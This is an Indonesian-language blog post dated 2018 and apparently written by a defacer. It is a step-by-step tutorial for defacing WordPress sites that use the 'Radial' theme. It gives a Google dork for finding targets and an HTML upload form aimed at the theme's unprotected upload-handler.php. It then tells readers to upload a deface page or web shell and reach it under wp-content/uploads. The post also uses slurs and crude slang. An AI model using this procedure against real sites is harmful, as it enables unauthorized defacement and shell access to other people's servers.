Jumat, 31 Agustus 2018

Deface Metode WordPress Themes Radial With Csrf

Post oleh : KN07 | Rilis : Agustus 31, 2018 | Series :

Yoo Wasaap Nigga Kale Ini Gua
Bakal Kasih Tutorial Lagi
Oke Langsung Saja :v

Bahan - Bahan :

Dork : inurl:/wp-content/themes/radial-theme/
Csrf  :
<form enctype="multipart/form-data"
action="http://site.co.li/wp-content/themes/radial-theme/functions/upload-handler.php"
method="post">
Please choose a file: <input name="orange_themes" type="file" /><br />
<input type="submit" value="ngentodupload" />
</form>
CSRF BY KN07 < XD

Exploit : /wp-content/themes/radial-theme/functions/upload-handler.php

Dorking Dolo Pake Google Image :v

Nah Gua Dah Dapet Target Mamank Buat Di Eue xD :v

Masukan Exploit : site.co.li
/wp-content/themes/radial-theme/functions/upload-handler.php

Kalo Dah Masukan Exploit Bakal Muncul Tulisan Error < Vuln Coeg :)

Tinggal Ke CSRF Menurut Kalean Itu Vuln ganti yang ada di csrf site.co.li < ganti target

Tinggal Upload Sc Ato Shell Kalo Udh Upload Bakal Muncul

Nama File Lu contoh TestingIndex.html & TestingIndex.php

Cara Akses site.ngo.cok/wp-content/uploads/tahun/bulan/namafile

Oke Sekian Mzzz


google+

linkedin